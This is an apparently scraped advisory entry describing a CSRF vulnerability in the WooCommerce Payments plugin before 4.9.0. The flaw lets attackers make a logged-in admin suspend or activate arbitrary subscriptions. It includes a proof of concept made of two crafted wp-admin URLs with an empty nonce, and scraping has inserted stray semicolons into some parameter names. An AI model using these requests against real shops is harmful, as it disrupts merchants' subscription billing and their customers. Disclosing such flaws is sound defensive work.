Lucene search
WpvulndbWPVDB-ID:7E4C0059-F8A7-4421-B906-1A6A801AEF2AHistorySep 11, 2023 - 12:00 a.m.
WooCommerce Payments < 4.9.0 - Subscription Suspension/Activation via CSRF
2023-09-1100:00:00
wpscan.com
2
woocommerce
payments
subscription
csrf
vulnerability
attack
admin
7.1 High
AI Score
Confidence
High
Description The plugin does not have CSRF check when suspending and activating subscriptions, which could allow attackers to make a logged in admin suspend or activate arbitrary subscription via a CSRF attack
PoC
Deactivate subscription with ID 53: https://example.com/wp-admin/edit.php?s=&post;_status=all&post;_type=shop_subscription&_wpnonce=&_wp_http_referer=&action;=on-hold&m;=0&_wcs_product=&_payment_method=&_customer_user=&paged;=1&post;[]=53&action2;=on-hold Activate subscription with ID 53: https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked;_on-hold=1&changed;=1&ids;=53&post;=53&_wpnonce=&action;=active
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 4.9.0 |
References
7.1 High
AI Score
Confidence
High